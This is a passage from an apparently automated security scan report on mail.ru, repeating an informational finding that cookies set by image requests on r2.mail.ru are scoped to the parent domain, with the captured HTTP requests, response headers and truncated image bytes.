GIF89a{.......................8..P.....I..$..A...............!.......,....{......0.I..8.....!.di.h..l.....tm.x..|..@.DA,....r.l:...BR.Z...v..z.... .....z.n....|>.$...~.........    .......................
...[SNIP]...

15.32. http://r2.mail.ru/b12179280.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12179280.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12179280.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:12 GMT
Content-Type: image/gif
Content-Length: 70
Connection: keep-alive
Set-Cookie: p=t9UGAE3BGQAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:12 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a...................!.......,.............#....D-..,.i^'T....R..;

15.33. http://r2.mail.ru/b12201458.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12201458.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12201458.png HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:12 GMT
Content-Type: image/png
Content-Length: 1232
Connection: keep-alive
Set-Cookie: p=19oGAErbVQAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:12 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

.PNG
.
...IHDR............e.t.....tEXtSoftware.Adobe ImageReadyq.e<...diTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

15.34. http://r2.mail.ru/b12526055.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526055.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526055.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:15 GMT
Content-Type: image/gif
Content-Length: 122
Connection: keep-alive
Set-Cookie: p=nt4GAFHdKwAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:15 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a
.2.....F..........!.......,....
.2...K.....\.r.J...J.y.8...............49.............n..3V.>..i.Z....k...m..2...;

15.35. http://r2.mail.ru/b12526056.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526056.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526056.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:15 GMT
Content-Type: image/jpeg
Content-Length: 3722
Connection: keep-alive
Set-Cookie: p=EuwGAEqNqQAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:15 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.4..
...[SNIP]...

15.36. http://r2.mail.ru/b12526057.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526057.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526057.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:16 GMT
Content-Type: image/jpeg
Content-Length: 2843
Connection: keep-alive
Set-Cookie: p=gNkGAEnndQAA; expires=Wed, 24-Apr-13 14:21:16 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:16 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.7..
...[SNIP]...

15.37. http://r2.mail.ru/b12526058.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526058.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526058.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:15 GMT
Content-Type: image/jpeg
Content-Length: 3343
Connection: keep-alive
Set-Cookie: p=lfUGAE2r7QAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:15 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.0..
...[SNIP]...

15.38. http://r2.mail.ru/b12526059.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526059.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526059.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:16 GMT
Content-Type: image/jpeg
Content-Length: 2876
Connection: keep-alive
Set-Cookie: p=8uAGAEipQQAA; expires=Wed, 24-Apr-13 14:21:16 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:16 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F....
...[SNIP]...

15.39. http://r2.mail.ru/b12526060.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526060.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526060.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:16 GMT
Content-Type: image/jpeg
Content-Length: 3123
Connection: keep-alive
Set-Cookie: p=V+YGAEiT0QAA; expires=Wed, 24-Apr-13 14:21:16 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:16 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.7..
...[SNIP]...

15.40. http://r2.mail.ru/b12526061.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526061.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526061.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:21 GMT
Content-Type: image/jpeg
Content-Length: 3005
Connection: keep-alive
Set-Cookie: p=SPYGAEidmwAA; expires=Wed, 24-Apr-13 14:21:21 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:21 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.4..
...[SNIP]...

15.41. http://r2.mail.ru/b12526062.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526062.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526062.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:21 GMT
Content-Type: image/jpeg
Content-Length: 3109
Connection: keep-alive
Set-Cookie: p=NOIGAEqT7AAA; expires=Wed, 24-Apr-13 14:21:21 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:21 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.7..
...[SNIP]...

15.42. http://r2.mail.ru/b12526063.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526063.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526063.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:21 GMT
Content-Type: image/jpeg
Content-Length: 2846
Connection: keep-alive
Set-Cookie: p=S+wGAEqNqQAA; expires=Wed, 24-Apr-13 14:21:21 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:21 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.6..
...[SNIP]...

15.43. http://r2.mail.ru/b12526064.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526064.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526064.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:22 GMT
Content-Type: image/jpeg
Content-Length: 2433
Connection: keep-alive
Set-Cookie: p=JRMHAEzBGQAA; expires=Wed, 24-Apr-13 14:21:22 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:22 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.6..
...[SNIP]...

15.44. http://r2.mail.ru/b12526065.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526065.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526065.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:22 GMT
Content-Type: image/gif
Content-Length: 119
Connection: keep-alive
Set-Cookie: p=uuYGAEiT0QAA; expires=Wed, 24-Apr-13 14:21:22 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:22 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a
.2.....F..........!.......,....
.2...H.....\.r.J...J.y.8.............-.....T...x..n..)kL.3..>;.P.t.Q..-f#.....;

15.45. http://r2.mail.ru/b12526191.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526191.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526191.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:25 GMT
Content-Type: image/gif
Content-Length: 535
Connection: keep-alive
Set-Cookie: p=rPYGAEqlaAAA; expires=Wed, 24-Apr-13 14:21:25 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:25 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a.........f.=p.2h.......8nz..`~.b.....4[....2Z....Ce....Km..T.Il......e'R~Lm....c...Bt...$N{...... Ix..d......8_..*aLo....Hl..7m....5k........../fa.]|..3h=c....,U..1h.......Ar.........Qr.!L|.2iG
...[SNIP]...

15.46. http://r2.mail.ru/b12526192.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526192.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526192.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:25 GMT
Content-Type: image/gif
Content-Length: 165
Connection: keep-alive
Set-Cookie: p=vaYGAFbDNQAA; expires=Wed, 24-Apr-13 14:21:25 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:25 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a.......`t.@|.=|.Qx.E|.=.L|.9..D~.G.@.................................................................!..Created with GIMP.,........... .@.p...4....@C.5.C..;

15.47. http://r2.mail.ru/b12526193.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526193.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526193.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/gif
Content-Length: 636
Connection: keep-alive
Set-Cookie: p=lPQGAFSf2AAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a.........(......]..':.7T.../................................................#H.#H...................e.....j........cv....0K.........................l...............:@..................Wc.[s.....
...[SNIP]...

15.48. http://r2.mail.ru/b12526194.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526194.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526194.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/gif
Content-Length: 93
Connection: keep-alive
Set-Cookie: p=kYsGAFT5qgAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a.........Us.....*..!.......,................#..."...jJ......&....X
....+X..u....
.DC..;

15.49. http://r2.mail.ru/b12526208.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526208.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526208.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
